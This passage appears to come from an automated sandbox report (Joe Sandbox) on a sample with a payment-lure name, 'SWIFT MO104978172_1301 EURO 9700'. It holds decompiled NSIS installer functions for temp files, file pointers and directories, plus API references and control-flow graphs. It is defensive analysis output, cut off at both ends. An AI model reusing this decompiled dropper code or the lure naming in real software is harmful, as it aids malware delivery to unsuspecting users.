                                                                                  					L6:
                                                                                  					if( *0x42a270 != 0 &&  *0x42a300 == 0) {
                                                                                  						 *0x420ef0 =  *0x420f00 -  *0x420ef4 - _a4 +  *0x40ce60;
                                                                                  						E0040302E(0);
                                                                                  					}
                                                                                  					 *0x40ce88 = 0x40cef0;
                                                                                  					 *0x40ce8c = 0x8000; // executed
                                                                                  					_t14 = E00406BB0(0x40ce68); // executed
                                                                                  					if(_t14 < 0) {
                                                                                  						goto L20;
                                                                                  					}
                                                                                  					_t36 =  *0x40ce88; // 0x40fe4f
                                                                                  					_t37 = _t36 - 0x40cef0;
                                                                                  					if(_t37 == 0) {
                                                                                  						__eflags =  *0x40ce84; // 0x0
                                                                                  						if(__eflags != 0) {
                                                                                  							goto L20;
                                                                                  						}
                                                                                  						__eflags = _t31;
                                                                                  						if(_t31 == 0) {
                                                                                  							goto L20;
                                                                                  						}
                                                                                  						L16:
                                                                                  						_t16 =  *0x420ef4;
                                                                                  						if(_t16 -  *0x40ce60 + _a4 > 0) {
                                                                                  							continue;
                                                                                  						}
                                                                                  						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
                                                                                  						goto L22;
                                                                                  					}
                                                                                  					_t18 = E0040620A( *0x40a01c, 0x40cef0, _t37); // executed
                                                                                  					if(_t18 == 0) {
                                                                                  						_push(0xfffffffe);
                                                                                  						L21:
                                                                                  						_pop(_t15);
                                                                                  						return _t15;
                                                                                  					}
                                                                                  					 *0x40ce60 =  *0x40ce60 + _t37;
                                                                                  					_t49 =  *0x40ce84; // 0x0
                                                                                  					if(_t49 != 0) {
                                                                                  						goto L6;
                                                                                  					}
                                                                                  					goto L16;
                                                                                  					L20:
                                                                                  					_push(0xfffffffd);
                                                                                  					goto L21;
                                                                                  				}
                                                                                  				return _t12 | 0xffffffff;
                                                                                  			}














                                                                                  0x00403489
                                                                                  0x0040349c
                                                                                  0x004034a1
                                                                                  0x004035d1
                                                                                  0x004035d3
                                                                                  0x00000000
                                                                                  0x004035d9
                                                                                  0x004034ad
                                                                                  0x004034c0
                                                                                  0x004034c6
                                                                                  0x004034cc
                                                                                  0x004034d7
                                                                                  0x004034dc
                                                                                  0x004034e1
                                                                                  0x004034e9
                                                                                  0x004034eb
                                                                                  0x004034eb
                                                                                  0x004034f4
                                                                                  0x004034fb
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00403501
                                                                                  0x00403507
                                                                                  0x0040350d
                                                                                  0x00000000
                                                                                  0x00403513
                                                                                  0x00403519
                                                                                  0x00403539
                                                                                  0x0040353e
                                                                                  0x00403543
                                                                                  0x00403549
                                                                                  0x0040354f
                                                                                  0x00403559
                                                                                  0x00403560
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00403562
                                                                                  0x00403568
                                                                                  0x0040356a
                                                                                  0x0040358d
                                                                                  0x00403593
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00403595
                                                                                  0x00403597
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00403599
                                                                                  0x00403599
                                                                                  0x004035ac
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004035bb
                                                                                  0x00000000
                                                                                  0x004035bb
                                                                                  0x00403574
                                                                                  0x0040357b
                                                                                  0x004035c8
                                                                                  0x004035ce
                                                                                  0x004035ce
                                                                                  0x00000000
                                                                                  0x004035ce
                                                                                  0x0040357d
                                                                                  0x00403583
                                                                                  0x00403589
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004035cc
                                                                                  0x004035cc
                                                                                  0x00000000
                                                                                  0x004035cc
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 0040348D
                                                                                    • Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
                                                                                  • SetFilePointer.KERNELBASE(?,00000000,00000000,00414EF0,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: FilePointer$CountTick
                                                                                  • String ID: ebruary
                                                                                  • API String ID: 1092082344-2749923991
                                                                                  • Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                                                  • Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
                                                                                  • Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                                                  • Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 609 406187-406193 610 406194-4061c8 GetTickCount GetTempFileNameW 609->610 611 4061d7-4061d9 610->611 612 4061ca-4061cc 610->612 614 4061d1-4061d4 611->614 612->610 613 4061ce 612->613 613->614
                                                                                  C-Code - Quality: 100%
                                                                                  			E00406187(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                                                  				intOrPtr _v8;
                                                                                  				short _v12;
                                                                                  				short _t12;
                                                                                  				intOrPtr _t13;
                                                                                  				signed int _t14;
                                                                                  				WCHAR* _t17;
                                                                                  				signed int _t19;
                                                                                  				signed short _t23;
                                                                                  				WCHAR* _t26;
                                                                                  
                                                                                  				_t26 = _a4;
                                                                                  				_t23 = 0x64;
                                                                                  				while(1) {
                                                                                  					_t12 =  *L"nsa"; // 0x73006e
                                                                                  					_t23 = _t23 - 1;
                                                                                  					_v12 = _t12;
                                                                                  					_t13 =  *0x40a5ac; // 0x61
                                                                                  					_v8 = _t13;
                                                                                  					_t14 = GetTickCount();
                                                                                  					_t19 = 0x1a;
                                                                                  					_v8 = _v8 + _t14 % _t19;
                                                                                  					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                                                                  					if(_t17 != 0) {
                                                                                  						break;
                                                                                  					}
                                                                                  					if(_t23 != 0) {
                                                                                  						continue;
                                                                                  					} else {
                                                                                  						 *_t26 =  *_t26 & _t23;
                                                                                  					}
                                                                                  					L4:
                                                                                  					return _t17;
                                                                                  				}
                                                                                  				_t17 = _t26;
                                                                                  				goto L4;
                                                                                  			}












                                                                                  0x0040618d
                                                                                  0x00406193
                                                                                  0x00406194
                                                                                  0x00406194
                                                                                  0x00406199
                                                                                  0x0040619a
                                                                                  0x0040619d
                                                                                  0x004061a2
                                                                                  0x004061a5
                                                                                  0x004061af
                                                                                  0x004061bc
                                                                                  0x004061c0
                                                                                  0x004061c8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004061cc
                                                                                  0x00000000
                                                                                  0x004061ce
                                                                                  0x004061ce
                                                                                  0x004061ce
                                                                                  0x004061d1
                                                                                  0x004061d4
                                                                                  0x004061d4
                                                                                  0x004061d7
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 004061A5
                                                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: CountFileNameTempTick
                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                  • API String ID: 1716503409-1857211195
                                                                                  • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                                                  • Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
                                                                                  • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                                                  • Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 615 403c25-403c34 616 403c40-403c48 615->616 617 403c36-403c39 CloseHandle 615->617 618 403c54-403c60 call 403c82 call 405d74 616->618 619 403c4a-403c4d CloseHandle 616->619 617->616 623 403c65-403c66 618->623 619->618
                                                                                  C-Code - Quality: 100%
                                                                                  			E00403C25() {
                                                                                  				void* _t1;
                                                                                  				void* _t2;
                                                                                  				void* _t4;
                                                                                  				signed int _t11;
                                                                                  
                                                                                  				_t1 =  *0x40a018; // 0xffffffff
                                                                                  				if(_t1 != 0xffffffff) {
                                                                                  					CloseHandle(_t1);
                                                                                  					 *0x40a018 =  *0x40a018 | 0xffffffff;
                                                                                  				}
                                                                                  				_t2 =  *0x40a01c; // 0xffffffff
                                                                                  				if(_t2 != 0xffffffff) {
                                                                                  					CloseHandle(_t2);
                                                                                  					 *0x40a01c =  *0x40a01c | 0xffffffff;
                                                                                  					_t11 =  *0x40a01c;
                                                                                  				}
                                                                                  				E00403C82();
                                                                                  				_t4 = E00405D74(_t11, L"C:\\Users\\engineer\\AppData\\Local\\Temp\\nsj2F71.tmp\\", 7); // executed
                                                                                  				return _t4;
                                                                                  			}







                                                                                  0x00403c25
                                                                                  0x00403c34
                                                                                  0x00403c37
                                                                                  0x00403c39
                                                                                  0x00403c39
                                                                                  0x00403c40
                                                                                  0x00403c48
                                                                                  0x00403c4b
                                                                                  0x00403c4d
                                                                                  0x00403c4d
                                                                                  0x00403c4d
                                                                                  0x00403c54
                                                                                  0x00403c60
                                                                                  0x00403c66

                                                                                  APIs
                                                                                  • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C37
                                                                                  • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C4B
                                                                                  Strings
                                                                                  • C:\Users\user\AppData\Local\Temp\nsj2F71.tmp\, xrefs: 00403C5B
                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandle
                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsj2F71.tmp\
                                                                                  • API String ID: 2962429428-1943657329
                                                                                  • Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                                                  • Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
                                                                                  • Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                                                  • Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 707 4015c1-4015d5 call 402da6 call 405fe2 712 401631-401634 707->712 713 4015d7-4015ea call 405f64 707->713 714 401663-4022f6 call 401423 712->714 715 401636-401655 call 401423 call 406668 SetCurrentDirectoryW 712->715 720 401604-401607 call 405c16 713->720 721 4015ec-4015ef 713->721 731 402c2a-402c39 714->731 732 40292e-402935 714->732 715->731 734 40165b-40165e 715->734 730 40160c-40160e 720->730 721->720 724 4015f1-4015f8 call 405c33 721->724 724->720 738 4015fa-401602 call 405b99 724->738 736 401610-401615 730->736 737 401627-40162f 730->737 732->731 734->731 740 401624 736->740 741 401617-401622 GetFileAttributesW 736->741 737->712 737->713 738->730 740->737 741->737 741->740
                                                                                  C-Code - Quality: 86%
                                                                                  			E004015C1(short __ebx, void* __eflags) {
                                                                                  				void* _t17;
                                                                                  				int _t23;
                                                                                  				void* _t25;
                                                                                  				signed char _t26;
                                                                                  				short _t28;
                                                                                  				short _t31;
                                                                                  				short* _t34;
                                                                                  				void* _t36;
                                                                                  
                                                                                  				_t28 = __ebx;
                                                                                  				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                                                                                  				_t17 = E00405FE2(_t16);
                                                                                  				_t32 = _t17;
                                                                                  				if(_t17 != __ebx) {
                                                                                  					do {
                                                                                  						_t34 = E00405F64(_t32, 0x5c);
                                                                                  						_t31 =  *_t34;
                                                                                  						 *_t34 = _t28;
                                                                                  						if(_t31 != _t28) {
                                                                                  							L5:
                                                                                  							_t25 = E00405C16( *(_t36 + 8));
                                                                                  						} else {
                                                                                  							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                                                                                  							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C33(_t42) == 0) {
                                                                                  								goto L5;
                                                                                  							} else {
                                                                                  								_t25 = E00405B99( *(_t36 + 8));
                                                                                  							}
                                                                                  						}
                                                                                  						if(_t25 != _t28) {
                                                                                  							if(_t25 != 0xb7) {
                                                                                  								L9:
                                                                                  								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                                  							} else {
                                                                                  								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                                                                  								if((_t26 & 0x00000010) == 0) {
                                                                                  									goto L9;
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  						 *_t34 = _t31;
                                                                                  						_t32 = _t34 + 2;
                                                                                  					} while (_t31 != _t28);
                                                                                  				}
                                                                                  				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                                                                                  					_push(0xfffffff5);
                                                                                  					E00401423();
                                                                                  				} else {
                                                                                  					E00401423(0xffffffe6);
                                                                                  					E00406668(L"C:\\Users\\engineer\\AppData\\Local\\Temp",  *(_t36 + 8));
                                                                                  					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                                                                  					if(_t23 == 0) {
                                                                                  						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                                  					}
                                                                                  				}
                                                                                  				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
                                                                                  				return 0;
                                                                                  			}











                                                                                  0x004015c1
                                                                                  0x004015c9
                                                                                  0x004015cc
                                                                                  0x004015d1
                                                                                  0x004015d5
                                                                                  0x004015d7
                                                                                  0x004015df
                                                                                  0x004015e1
                                                                                  0x004015e4
                                                                                  0x004015ea
                                                                                  0x00401604
                                                                                  0x00401607
                                                                                  0x004015ec
                                                                                  0x004015ec
                                                                                  0x004015ef
                                                                                  0x00000000
                                                                                  0x004015fa
                                                                                  0x004015fd
                                                                                  0x004015fd
                                                                                  0x004015ef
                                                                                  0x0040160e
                                                                                  0x00401615
                                                                                  0x00401624
                                                                                  0x00401624
                                                                                  0x00401617
                                                                                  0x0040161a
                                                                                  0x00401622
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00401622
                                                                                  0x00401615
                                                                                  0x00401627
                                                                                  0x0040162b
                                                                                  0x0040162c
                                                                                  0x004015d7
                                                                                  0x00401634
                                                                                  0x00401663
                                                                                  0x004022f1
                                                                                  0x00401636
                                                                                  0x00401638
                                                                                  0x00401645
                                                                                  0x0040164d
                                                                                  0x00401655
                                                                                  0x0040165b
                                                                                  0x0040165b
                                                                                  0x00401655
                                                                                  0x00402c2d
                                                                                  0x00402c39

                                                                                  APIs
                                                                                    • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,746AFAA0,?,746AF560,00405D94,?,746AFAA0,746AF560,00000000), ref: 00405FF0
                                                                                    • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                                                    • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                    • Part of subcall function 00405B99: CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
                                                                                  Strings
                                                                                  • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                  • String ID: C:\Users\user\AppData\Local\Temp
                                                                                  • API String ID: 1892508949-1104044542
                                                                                  • Opcode ID: 78b35cda00fef60e7fad3ee9365003173471bcb7d959d196d715232f24f54807
                                                                                  • Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
                                                                                  • Opcode Fuzzy Hash: 78b35cda00fef60e7fad3ee9365003173471bcb7d959d196d715232f24f54807
                                                                                  • Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 744 40603f-40605a call 406668 call 405fe2 749 406060-40606d call 4068ef 744->749 750 40605c-40605e 744->750 754 40607d-406081 749->754 755 40606f-406075 749->755 751 4060b8-4060ba 750->751 757 406097-4060a0 lstrlenW 754->757 755->750 756 406077-40607b 755->756 756->750 756->754 758 4060a2-4060b6 call 405f37 GetFileAttributesW 757->758 759 406083-40608a call 40699e 757->759 758->751 764 406091-406092 call 405f83 759->764 765 40608c-40608f 759->765 764->757 765->750 765->764
                                                                                  C-Code - Quality: 53%
                                                                                  			E0040603F(void* __eflags, intOrPtr _a4) {
                                                                                  				int _t11;
                                                                                  				signed char* _t12;
                                                                                  				long _t16;
                                                                                  				intOrPtr _t18;
                                                                                  				intOrPtr* _t21;
                                                                                  				signed int _t23;
                                                                                  
                                                                                  				E00406668(0x425f50, _a4);
                                                                                  				_t21 = E00405FE2(0x425f50);
                                                                                  				if(_t21 != 0) {
                                                                                  					E004068EF(_t21);
                                                                                  					if(( *0x42a278 & 0x00000080) == 0) {
                                                                                  						L5:
                                                                                  						_t23 = _t21 - 0x425f50 >> 1;
                                                                                  						while(1) {
                                                                                  							_t11 = lstrlenW(0x425f50);
                                                                                  							_push(0x425f50);
                                                                                  							if(_t11 <= _t23) {
                                                                                  								break;
                                                                                  							}
                                                                                  							_t12 = E0040699E();
                                                                                  							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                                                  								E00405F83(0x425f50);
                                                                                  								continue;
                                                                                  							} else {
                                                                                  								goto L1;
                                                                                  							}
                                                                                  						}
                                                                                  						E00405F37();
                                                                                  						_t16 = GetFileAttributesW(??); // executed
                                                                                  						return 0 | _t16 != 0xffffffff;
                                                                                  					}
                                                                                  					_t18 =  *_t21;
                                                                                  					if(_t18 == 0 || _t18 == 0x5c) {
                                                                                  						goto L1;
                                                                                  					} else {
                                                                                  						goto L5;
                                                                                  					}
                                                                                  				}
                                                                                  				L1:
                                                                                  				return 0;
                                                                                  			}









                                                                                  0x0040604b
                                                                                  0x00406056
                                                                                  0x0040605a
                                                                                  0x00406061
                                                                                  0x0040606d
                                                                                  0x0040607d
                                                                                  0x0040607f
                                                                                  0x00406097
                                                                                  0x00406098
                                                                                  0x0040609f
                                                                                  0x004060a0
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406083
                                                                                  0x0040608a
                                                                                  0x00406092
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040608a
                                                                                  0x004060a2
                                                                                  0x004060a8
                                                                                  0x00000000
                                                                                  0x004060b6
                                                                                  0x0040606f
                                                                                  0x00406075
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406075
                                                                                  0x0040605c
                                                                                  0x00000000

                                                                                  APIs
                                                                                    • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                                                    • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,746AFAA0,?,746AF560,00405D94,?,746AFAA0,746AF560,00000000), ref: 00405FF0
                                                                                    • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                                                    • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                                                  • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,746AFAA0,?,746AF560,00405D94,?,746AFAA0,746AF560,00000000), ref: 00406098
                                                                                  • GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,746AFAA0,?,746AF560,00405D94,?,746AFAA0,746AF560), ref: 004060A8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                  • String ID: P_B
                                                                                  • API String ID: 3248276644-906794629
                                                                                  • Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                                                  • Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
                                                                                  • Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                                                  • Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 767 407194-40719a 768 40719c-40719e 767->768 769 40719f-4071bd 767->769 768->769 770 407490-40749d 769->770 771 4073cb-4073e0 769->771 774 4074c7-4074cb 770->774 772 4073e2-4073f8 771->772 773 4073fa-407410 771->773 775 407413-40741a 772->775 773->775 776 40752b-40753e 774->776 777 4074cd-4074ee 774->777 778 407441 775->778 779 40741c-407420 775->779 782 407447-40744d 776->782 780 4074f0-407505 777->780 781 407507-40751a 777->781 778->782 783 407426-40743e 779->783 784 4075cf-4075d9 779->784 785 40751d-407524 780->785 781->785 787 406bf2 782->787 788 4075fa 782->788 783->778 789 4075e5-4075f8 784->789 790 4074c4 785->790 791 407526 785->791 792 406bf9-406bfd 787->792 793 406d39-406d5a 787->793 794 406c9e-406ca2 787->794 795 406d0e-406d12 787->795 797 4075fd-407601 788->797 789->797 790->774 798 4074a9-4074c1 791->798 799 4075db 791->799 792->789 800 406c03-406c10 792->800 793->771 803 406ca8-406cc1 794->803 804 40754e-407558 794->804 801 406d18-406d2c 795->801 802 40755d-407567 795->802 798->790 799->789 800->788 805 406c16-406c5c 800->805 806 406d2f-406d37 801->806 802->789 807 406cc4-406cc8 803->807 804->789 808 406c84-406c86 805->808 809 406c5e-406c62 805->809 806->793 806->795 807->794 810 406cca-406cd0 807->810 815 406c94-406c9c 808->815 816 406c88-406c92 808->816 813 406c64-406c67 GlobalFree 809->813 814 406c6d-406c7b GlobalAlloc 809->814 811 406cd2-406cd9 810->811 812 406cfa-406d0c 810->812 817 406ce4-406cf4 GlobalAlloc 811->817 818 406cdb-406cde GlobalFree 811->818 812->806 813->814 814->788 819 406c81 814->819 815->807 816->815 816->816 817->788 817->812 818->817 819->808
                                                                                  C-Code - Quality: 99%
                                                                                  			E00407194() {
